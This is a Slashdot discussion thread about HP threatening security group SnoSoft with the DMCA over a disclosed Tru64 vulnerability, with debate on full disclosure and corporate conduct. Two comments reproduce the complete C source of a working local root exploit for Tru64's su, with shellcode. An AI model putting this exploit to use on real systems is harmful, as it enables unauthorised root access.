Censorship

HP Uses DMCA To Quash Vulnerability Publication 675

Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."


  • Bruce Perens (Score:5, Insightful)

    by BoyPlankton ( 93817 ) on Tuesday July 30, 2002 @08:33PM (#3982899) Homepage
    So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?
    • Re:Bruce Perens (Score:5, Informative)

      by Bruce Perens ( 3872 ) <bruce@perens.com> on Tuesday July 30, 2002 @10:33PM (#3983563) Homepage Journal
      I don't know, but I am not happy to hear this at all. And if it's true, I'll take them to task for it. This is the first I've heard of the whole thing.

      Bruce

      • Re:Bruce Perens (Score:5, Informative)

        by Bruce Perens ( 3872 ) <bruce@perens.com> on Tuesday July 30, 2002 @10:52PM (#3983655) Homepage Journal
        By the way, my phone is 510-526-1165, if you feel the need to talk about this. I leave that line off the hook when I don't want calls, but it's available most of the day.

        Bruce

        • by Anonymous Coward on Wednesday July 31, 2002 @12:21AM (#3983966)
          I don't see the point of taking HP to task for it.
          It's a waste of time. Even if they back off .. whoopdee doo.

          Please .. what we need is a change in the law.

          Hackers can expose findings and report them to companies .. too often a flaw gets found and the company sweeps it under the rug maybe they'll fix it in the next version but prior versions are vulnerable.

          Given the sad fact that all our politicians (not just in America but worldwide) are elected by money, maybe the following compromise can be reached:

          a) Hackers who find vulnerabilities must email a notice and description to the company. He must try to give at least 24 hours notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDOS attack or something). In that case he should be allowed to announce it to the public immediately.

          b) Companies that take no action (that is, don't make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public are liable for exploits.

          c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.

          Is there any way for you to use your publicity to bring something like this about?

          At least try. I hate the fact that curiosity is now a crime. I am allowed to take apart my car and see how it works .. why can't I do it with the applications I use and store my deeply personal information (from baby pictures to tax and health records) on?

          Thanks,

          Johan
        • by Anonymous Coward
          Posting your phone number on /. - damn, I guess you do need that wheelbarrow!
      • by Futurepower(R) ( 558542 ) on Tuesday July 30, 2002 @11:22PM (#3983763) Homepage

        Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.

        This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irreparable damage to HP.

        We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?

        It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
        • by Bruce Perens ( 3872 ) <bruce@perens.com> on Wednesday July 31, 2002 @12:13AM (#3983939) Homepage Journal
          Let's not get draconian yet, it could be correcting a wrong with another wrong. Maybe an apology is what is necessary, and perhaps that would teach a better lesson to all involved. But I can't say what is necessary until I see full data. All I have tonight are news reports.

          Bruce

          • Let's not get draconian yet,

            I'm going to wander slightly off topic here but I feel what you are saying is wrong. Today, top company executives seem to be above the law. They can operate their companies however they choose. No one ever seems to hold them accountable. A company goes bankrupt, thousands lose their jobs and top executives are laughing all the way to the bank. In this example an executive acts in an irresponsible manner that could affect many of his customers, and you suggest merely a wrist slap?

      • Re:Bruce Perens (Score:4, Interesting)

        by Bruce Perens ( 3872 ) <bruce@perens.com> on Wednesday July 31, 2002 @12:06AM (#3983906) Homepage Journal
        I just woke up my boss and am in email correspondence with various other people. Obviously, a lot of the people involved are going to be unavailable until tomorrow morning.

        My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.

        Thanks

        Bruce

      • by Bruce Perens ( 3872 ) <bruce@perens.com> on Wednesday July 31, 2002 @01:07AM (#3984116) Homepage Journal
        Folks,

        In my investigation, I read the Snosoft home page [snosoft.com]. This is the second sentence of their introductory paragraph:

        Our advisory release policy is full disclosure unless bound by contract.

        Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?

        I would hate to be manipulated in a shakedown of my own company.

        On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.

        What do you think?

        Bruce

        • by friedmud ( 512466 ) on Wednesday July 31, 2002 @01:27AM (#3984181)
          Bruce,

          I guess I don't understand how full disclosure can equate to a shakedown.

          The company (snosoft) seems like a more or less legit research company, and the fact that they have a full disclosure policy in no way says that they are trying to take out companies. It just says, up front, that they have a policy of disclosing these security breaches that they find.

          On the other hand they have to make money somehow - so they contract out their services to companies who wish to have their software audited.

          I could be wrong, but by looking through their posts on security focus, I don't think they are out to extort money from companies - and this is especially true if they gave HP a year to fix this problem (in fact if that is true then you should REALLY stick it to the top brass).

          It could go either way - but it doesn't look like they are in the business of extortion. And the fact that they have been around for a while, and seem to be respected in the security community says quite a lot....

          ON THE OTHER HAND.... I don't see how it is in any way, shape or form right for HP to sic the DMCA on them, no matter what their business practices are. This is a vulnerability in HPQ's software and should not be treated with such arrogance (don't report it or else!).

          Just my $.02

          Derek
        • It looks like that text has been removed - at least, I don't notice it at that URL (or during a cursory search through the site). Having said that - this does put forward an interesting question.

          How are contracted researchers expected to behave in such a situation?

          It seems that the usual "full disclosure" notice comes from an audit of a product by an external group / individual without contract or invitation by the producer of that product (publicity-grabbing "hacker challenges" aside). Such reports certainly warn the product's user base. But they also seem to be an attempt to embarrass the producer of that product into action - patching the current issue and perhaps increasing future quality control.

          What if the research group is hired by WidgetSoft to audit the Widget2000 and they discover a major vulnerability? It is unlikely the public will ever hear of it from the research group. WidgetSoft will likely develop the patch, and release it with their own report based on the research group's findings.

          But what if WidgetSoft decides to bury the findings? Then our hypothetical research group has a dilemma. It would be wise for this group to be sure their business contract specifically avoids conflicting with their morals.

          Unless, of course, they're in the business of the shake-down.
        • Bruce,
          Even if it was a company that engaged in outright extortion, i.e. "we just found this hole, pay us $10,000 by Friday or we release it", some advice my Mother gave me comes to mind.

          Two Wrongs Don't Make a Right

          HP's customers are innocent third parties in this matter. Once the exploit was released, no matter how shady the people who released it were, HP should have been trying to notify its customers instead of engaging in a futile attempt to put the cat back in the bag. HP has increased the harm to innocent third parties by not contacting them, and now their actions have ensured that the code for the exploit is more widely distributed than before.

          SnoSoft's actions may have been wrong, but that did not give HP a license to engage in wrong actions of their own.

      • Re:Bruce Perens (Score:4, Interesting)

        by 0xA ( 71424 ) on Wednesday July 31, 2002 @03:18AM (#3984528)
        Bruce,

        I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.

        I have been working with Compaq and HP systems my entire career, Intel based servers, UNIX servers and workstations, printer and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.

        As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information; given the nature of many of the parties involved, I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly the situation gets complicated; the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light; I suspect that the group has acted in bad faith or at least "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.

        However the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on its head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The good chance that SnoSoft has discovered a problem that others know about or are exploiting cannot be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine; I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them then that is what I will do.

        Regardless of the events leading to Mr. Ferson's letter to SnoSoft, HP must clarify their position on this situation. I would hope that you are willing to state that, provided no illegal methods were used to discover the vulnerability, HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breach of contract it is a matter for civil courts.

        Aaron Schneider
        Manager, Information Technology
        Fabutan Sun Tan Studios
        Schneider@fabutan.com
  • Ironic (Score:5, Insightful)

    by chill ( 34294 ) on Tuesday July 30, 2002 @08:33PM (#3982905) Journal
    No WONDER they wanted Mr. Perens to not demonstrate at that conference. Can you IMAGINE the dueling press releases -- on one hand, defeating DRM and on the other using the club of the DMCA.

    The chickenshit weasels.
  • by Anonymous Coward
    This case, if the facts hold up, is potentially among the strongest that could be made before the courts. It's not just "evil hacker" that wants to steal stuff, it's a legitimate security problem that a company is trying to keep quiet.

    The Supreme Court tends to frown heavily on prior restraint.
  • Apache (Score:5, Insightful)

    by vex24 ( 126288 ) on Tuesday July 30, 2002 @08:34PM (#3982913) Homepage
    Funny how when Apache had a hole released before they had a chance to fix it, they gave off a muted air of annoyance and fur that had been rubbed the wrong way.

    Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.

    • Re:Apache (Score:5, Insightful)

      by gmack ( 197796 ) <gmack@noSpAM.innerfire.net> on Tuesday July 30, 2002 @09:11PM (#3983139) Homepage Journal
      Look at the difference though .. Xforce didn't wait before releasing a patch that failed to fix the problem along with an advisory that didn't grasp the full scope of the bug they found.

      These guys waited a YEAR and HP still hadn't fixed the problem.
  • by rodgerd ( 402 ) on Tuesday July 30, 2002 @08:35PM (#3982919) Homepage
    When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.

    Anyone still feel like laughing?
    • by Rohan427 ( 521859 ) on Tuesday July 30, 2002 @10:08PM (#3983452)
      I actually submitted to LKML - on 8/1/2001 - that the DMCA could be used in this manner, and I also submitted several posts regarding other warnings about other laws. I hate to say I told you/them so, but I did:

      [SNIP of e-mail quote I replied to]
      "It's very simple, and something like this is done all the time in the security industry by people who not only enjoy it, but who get paid to do it.

      1) Discover an exploit or a new way of using a known exploit.
      2) Write a trojan, virus, worm, etc. that takes advantage of the exploit.
      3)* Report the exploit to the applicable compan(y/ies), Security Focus, etc. and provide the BINARY of your trojan, virus, or whatever so they can test the exploit and find a fix.

      * Usually people provide the source code as open software. In this case (for this argument) we release it as binary only and keep full rights.

      No law was broken when the trojan, virus, etc. was written and no one can (technically) seek prosecution. Under DMCA (at least the way the writers of it have used it), anyone attempting to reverse engineer your virus (or whatever) and provide an antigen, is liable to you and you can sue them.

      To take another angle, those of us who actively look for exploits in software (because companies like M$ fail to do so themselves) risk being sued for doing so. This makes jobs like mine EXTREMELY difficult because on the one hand I don't want my company using software that will allow Joe Cracker to take over our machines, and on the other I don't want the company sued just because I did some necessary reverse engineering in order to prevent it (again, because the software mfg. can't be trusted to do it themselves).

      PGA

      --
      Paul G. Allen
      UNIX Admin II/Programmer
      Akamai Technologies, Inc.
      www.akamai.com
      Work: xxx-xxx-xxxx
      Cell: xxx-xxx-xxxx"

      (Note: I no longer work for the above referenced company as my office was closed late last year. My statements and views are mine alone and do not, nor ever have, represented the views of Akamai Technologies, Inc. or any of its officers and/or representatives.)

      So, what do _I_ get for my warnings to the kernel developers? Blackballed from the list by the maintainer, in a rather rude fashion IMO. (despite the fact that I've received many a thank you for the information I had provided)

      So, to all those who have read, heard, and seen such warnings, wherever you've read, seen, or heard them, and were asked to take action and do not, I say stop whining, shut up, and suffer. The same thing I tell people who don't vote - if you can't do your part to fight the problem, you have no right to bitch and moan about it.

      My solution to many of these issues is not to support the companies promoting them. I no longer buy CDs, DVDs, or go to movies (yes, I will be missing the second in the LotR series - which I have long awaited.) I do not buy Compaq, and will never buy another HP device. I do not buy M$ products or anything that runs on M$ platforms either. I have written letters to congress critters, etc. as well.

      How many others can say they've actually done their part to fight the DMCA, US Patriot Act, CDBTPA, etc. and/or whatever equivalent laws you may have in your own countries?

      I for one wish more folks in Alan's position would speak up. I commend him for doing his part, and he's not even a US citizen, is he?

      I for one never did laugh at him.

      PGA
      • > I no longer buy CDs,

        That's a shame. There is a lot of great music on independent labels who have a really good attitude to their fans. They don't hide lyric sheets, they often waive some radio fees and in many cases they work through local recording studios and CD firms, helping them to survive and support local music.

        I don't know about the USA but the UK has many relatively independent and completely independent small labels (eg www.showofhands.co.uk - a band whose musicians actually go around teaching people to play their music, www.madrarua.com (ok, I'm biased, they are in Swansea)). When I visited St. John's, Newfoundland I was amazed at the huge, mostly independent and deeply vibrant music culture there.

  • FUCK HP (Score:2, Insightful)

    by Anonymous Coward
    Here's another fucking BIG CORP trying to strongarm to get their way.

    Fuck HP. It's like Ford trying to get the safety concerns of the Pinto hushed up.

    Consumers are in danger, and WE COME FIRST.
  • by shoemakc ( 448730 ) on Tuesday July 30, 2002 @08:36PM (#3982923) Homepage

    Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...

    -Chris

  • If suits like this go to trial, and don't result in huge gains for the plaintiff, the caselaw will tend to discourage others. In some ways that would be better than a repeal.

  • An Excellent Quote (Score:5, Insightful)

    by unsinged int ( 561600 ) on Tuesday July 30, 2002 @08:37PM (#3982927)
    Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford Explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."

    When will people learn this is the same thing?
    • by rodgerd ( 402 )
      Why, when the media conglomerates who lobbied for this bill use the newspapers (they own), TV news and documentaries (they own) and radio shows (they own) to explain to people why the DMCA is such a bad idea, and what the negative ramifications of it are.

      I'm sure the congressmen (they own) will also take a responsible line, and won't conflate these kinds of issues with actual breaches of copyright, terrorism, or other acts most people consider unacceptable.
  • by SunCrushr ( 153472 )
    Finding and publishing a security hole in an OS is not a way to circumvent copyright protection.
    If I take over somebody's Tru64 machine via this security hole, I haven't broken copyright at all.
    Now, if I take documents off of the server, then I may be breaking copyright, but I don't think the connection is strong enough to stand up in a court of law.
    I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright. Does that mean we should ban guns since they are a possible copyright protection circumvention device?
  • by JoeBuck ( 7947 ) on Tuesday July 30, 2002 @08:40PM (#3982943) Homepage

    It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.

    But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.

    It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?

    • I suspect Bruce won't be able to reply here for legal reasons (though he may be able, we'll see) but he's definitely reading, I think we can all guess that. HPaq is going to be increasingly difficult to work with in the future, by any guess I think I can make. They're bigger, they're badder, more bloated, and they're aiming at a much more demanding and volatile market, so any "advantage" they can use to squash the appearance of failure or flaw is going to be rapidly pounced upon before they suffer the fate of any large star that runs out of power. The DMCA is just today's big stick. Will they bring out a bigger one later?

      Does this cause Bruce to reconsider his employer? Only Bruce knows. Does this cause us to want him to make a statement by resigning or taking some other action? I suspect so. But I don't want to see the community pushing him toward a decision that isn't in his best interests. I think we just need to sit back and wait, to see what happens next.
      • One has to balance law and personal integrity. If things went down the way they were reported - and that's a big if - I would not really be able to stand by this, and would probably air some criticism of HP management. When I was hired, I did negotiate how and when I could criticize the company, and this falls within those parameters. Would I quit? Some people think I should stay around and try to teach them the right thing to do. Not that this would be easier than quitting. But HP isn't going away just because I slam the door on them.

        Bruce

    • I just heard of this for the first time, so give me some time to speak with the people involved.

      Bruce

  • Simply linking to the source code, like they are, could get them into trouble, could it not?

    http://deepmagic.securify.org.uk:8080/su.c
    • by User 956 ( 568564 ) on Tuesday July 30, 2002 @09:15PM (#3983157) Homepage
      #include stdio.h
      #include stdlib.h
      #include string.h
      #include unistd.h

      char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

      main(int argc, char *argv[]) {
      int i, j; char buffer[8239]; char payload[15200];
      char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i8233;i++) buffer[i] = 0x41;

      buffer[i++] = 0x01; buffer[i++] = 0x04;
      buffer[i++] = 0x01; buffer[i++] = 0x40;
      buffer[i++] = 0x01;

      for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
      for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
      printf("/bin/su by phased\n");
      printf("payload %db\n", strlen(payload));
      printf("buffer %db\n", strlen(buffer));
      execl("/usr/bin/su", "su", buffer, payload, 0);
      }

      • I think the truly impressive part of this code is getting past the lameness filter... that's gotta be against some law
      • by User 956 ( 568564 ) on Wednesday July 31, 2002 @01:54AM (#3984264) Homepage
        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>
        #include <unistd.h>

        char shellcode[]=
        "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
        "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

        main(int argc, char *argv[]) {
        int i, j;
        char buffer[8239];
        char payload[15200];
        char nop[] = "\x1f\x04\xff\x47";

        bzero(&buffer, 8239);
        bzero(&payload, 15200);

        for (i=0;i<8233;i++)
        buffer[i] = 0x41;

        /* 0x140010401 */

        buffer[i++] = 0x01;
        buffer[i++] = 0x04;
        buffer[i++] = 0x01;
        buffer[i++] = 0x40;
        buffer[i++] = 0x01;

        for (i=0;i<15000;) {
        for(j=0;j<4;j++) {
        payload[i++] = nop[j];
        }
        }

        for (i=i,j=0;j<sizeof(shellcode);i++,j++)
        payload[i] = shellcode[j];

        printf("/bin/su by phased\n");
        printf("payload %db\n", strlen(payload));
        printf("buffer %db\n", strlen(buffer));

        execl("/usr/bin/su", "su", buffer, payload, 0);

        }

  • by ocie ( 6659 ) on Tuesday July 30, 2002 @08:41PM (#3982947) Homepage
    "HP hereby requests that you cooperate with us to remove the buffer overflow exploit from Securityfocus.com"

    HP users hereby request that HP remove the buffer overflow exploit from Tru64.
    • by weave ( 48069 )
      "HP hereby requests that you cooperate with us to remove the buffer overflow exploit from Securityfocus.com"

      How long before Security Focus's new owner, Symantec, starts to take threats like this and force Security Focus to comply with demands like this?

      I just checked, at least the post in question is still in their mailing list archives...

  • DMCA and research (Score:4, Insightful)

    by Col. Klink (retired) ( 11632 ) on Tuesday July 30, 2002 @08:41PM (#3982953)
    HP's dramatic warning appears to be the first time the DMCA has been invoked to stifle research related to computer security.
    Um... wasn't that whole Felten/SDMI thing the first time the DMCA was invoked* to stifle research related to computer security?

    * Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.

  • by zaren ( 204877 ) <fishrocket@gmail.com> on Tuesday July 30, 2002 @08:41PM (#3982955) Journal
    "On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "

    Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
    • I suppose you'd like an assassins' guild too, so that amateurs and people outside your sphere of influence don't commit murders? It doesn't work that way. Sorry.
    • by m0rph3us0 ( 549631 ) on Tuesday July 30, 2002 @08:49PM (#3982999)
      The article says they informed HP about these vulns a year earlier. In reality it is up to the company to secure their products; mistakes happen, but should Ralph Nader be put in jail for telling people that the Pinto's gas tank would explode on impact?
    • by dnoyeb ( 547705 ) on Tuesday July 30, 2002 @09:08PM (#3983120) Homepage Journal
      Yes, HP could possibly assume the exploit is not totally public. As it stands, some random Joe posting an exploit says the exploit is mainstream by now...
    • by Karma Farmer ( 595141 ) on Tuesday July 30, 2002 @10:12PM (#3983479)
      Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way.

      No, of course you wouldn't like it. And, if you were an emperor who got suckered into walking around naked, you'd be fairly pissed at the kid who pointed out that you were, in fact, naked.

      But, this story has nothing to do with HP "liking" or "not liking" it when people (rightly) point out that they're walking around naked. The story is about the fact that the DMCA has emboldened HP to the point that they feel it's better to walk around naked and sue anyone who notices, rather than buying some reasonable clothes.

      Etiquette in the security community demands that the discoverers of holes give companies reasonable time to respond to security problems, before publicizing the security problems. But this courtesy is not, in any way, a courtesy towards the company that manufactures the flawed product. That company's opinion in the matter doesn't mean squat. It is a courtesy extended entirely to the users of the product. Users are harmed if they do not know about exploitable flaws in the products they use, but at the same time users are harmed if the exploitable flaws are widely known before patches are available. The only reasonable role for a company with flawed products in the security process is to work diligently to minimize the harm to users, by the only method available to them -- by expediting patches for their products, and thus providing an environment where the user can be informed of security flaws in their product as quickly as possible.

      Unfortunately, what HP has done here is imagine itself to have some other role in the security process -- someone at HP is under the completely mistaken impression that their opinion of the security process matters in any way. It does not. The courtesies of the security process are entirely towards the users of the flawed product. People have a right to know about flawed products. HP has the opportunity to provide patches to their product, so that those users might have some alternative to simply throwing all of their HP equipment in the garbage, but that is entirely HP's opportunity, and really of no concern either to the users or to the security professionals who disclose the hole.
  • by ecalkin ( 468811 ) on Tuesday July 30, 2002 @08:42PM (#3982958)
    this is really a shame. hp was one of the technology companies that had a lot going for it.

    when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achieve the immediate goal of suppressing bad stuff (real or imagined).

    so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.

    eric

    p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.
  • bugtraq email (Score:4, Informative)

    by Anonymous Coward on Tuesday July 30, 2002 @08:44PM (#3982966)
    Contents of the bugtraq email. Doing anon, fearful of prison buggery:


    got fed up of corporate bullshit
    here is the warez, nothing special, but it does the job :)
    note, this is just one of many many exploitable bofs in tru64 5.x
    http://deepmagic.securify.org.uk:8080/su.c
    phased
    phased@mail

  • Very Frustrating (Score:2, Insightful)

    by Anonymous Coward
    How are we to feel secure while computing if it is illegal to check up on the companies providing the software/hardware solutions?

    Imagine, if you would, a secure piece of software (or a secure piece of hardware) is sold to handle monetary transactions, and no one can verify that the software/hardware is in fact secure ... except the criminals who are going to exploit the vulnerability and steal hard-earned money.

    Yay for the DMCA for protecting corporations instead of the individual!

    my 2 cents.
  • I will never buy another one of your products, and I am seriously considering returning the ones that I have. I am in the position that has a great deal of spending power and 95% of the say as to what my company purchases, and I will never purchase an HP or Compaq product again. Thank you very much.

    Sincerely,

    A Former Customer.
    • A big customer could claim this damages their ability to operate and sue HP for suppressing information, the absence of which could lead to increased vulnerabilities in their systems.

      It's too bad that people have egos, also, because if things like hard crypto implementations, security information, and so on were simply released anonymously into various outlets (e.g., not just the net), there would be nobody to sue.

      In this case I think there won't be anybody to sue either -- the individual who made the report might not be subject to US law.

      Take this to its logical conclusion, and realize that computer systems in the USA will tend to be less secure than their counterparts in free countries that do not suppress information exchange. I wish it were simpler to relocate to Europe; it sure as hell appears to be easy for them to relocate to the USA.

  • by m0rph3us0 ( 549631 ) on Tuesday July 30, 2002 @08:47PM (#3982985)
    in other news today the FBI raids the offices of SnoSoft in search of DMCA-prohibited cracking tools; they immediately seize compilers, source code, and felt markers.
  • by KFury ( 19522 ) on Tuesday July 30, 2002 @08:50PM (#3983005) Homepage
    So is this a sign that Microsoft will once again(?) be a secure platform, because now in addition to:
    • Security through Obscurity
    and
    • Security through Diligence
    we now add the mighty
    • Security through Litigation?
    To be fair, when do the handgun designers go to jail again?
  • DMCA Violation? (Score:3, Insightful)

    by _LFTL_ ( 409654 ) on Tuesday July 30, 2002 @08:50PM (#3983006)
    Ok someone fill me in here:

    How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?
    • Re:DMCA Violation? (Score:4, Insightful)

      by fishbowl ( 7759 ) on Tuesday July 30, 2002 @08:55PM (#3983037)
      It does not. And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off. Until someone does this, it's an open question whereby the mere threat of anything and everything is enough to control the behavior of individuals.

      • Re:DMCA Violation? (Score:4, Interesting)

        by buss_error ( 142273 ) on Tuesday July 30, 2002 @09:16PM (#3983162) Homepage Journal
        And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off.

        It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?

        The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CD's, swap DVD's, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.

        If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?

        Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.

        OK, so I'm a broken record.

  • Ridiculous (Score:5, Insightful)

    by dh003i ( 203189 ) <dh003i@gmail. c o m> on Tuesday July 30, 2002 @08:54PM (#3983033) Homepage Journal
    The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.

    HP trying to cover this up just proves it's a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS.

    People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their careers. Data important to one's career (e.g., scientific experimental data) is stored on one's computer. Private information -- e.g., credit card information -- is stored on a computer. Security holes can literally destroy one's life.

    We have the right to know exactly what problems there are in our software.
  • The DMCA just made this world a safer place.

    Don't ask, don't tell.
  • as a Tru64 admin... (Score:4, Interesting)

    by Corgha ( 60478 ) on Tuesday July 30, 2002 @08:59PM (#3983059)
    This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...

    Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.

    Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).

    It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
  • by Arcturax ( 454188 ) on Tuesday July 30, 2002 @09:02PM (#3983085)
    Email their president and CEO from this page! [hp.com]

    Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.
    • by Anonymous Coward on Tuesday July 30, 2002 @09:31PM (#3983245)
      Dear Ms. Fiorina,

      I just read about your company's threat of action under the DMCA against a security researcher who released exploit information about your Tru64 Unix product. As a software engineer working for a large competitor of yours, I'd like to thank you for your actions. The well-earned reputation for security and reliability of our product can only be enhanced by ill-mannered attempts at suppressing information from your company. Any further help you can provide in assuring my future job security in this uncertain economy will be greatly appreciated.
    • My mail to Carly (Score:4, Interesting)

      by CrayDrygu ( 56003 ) on Tuesday July 30, 2002 @10:31PM (#3983553)
      Mrs Fiorina,

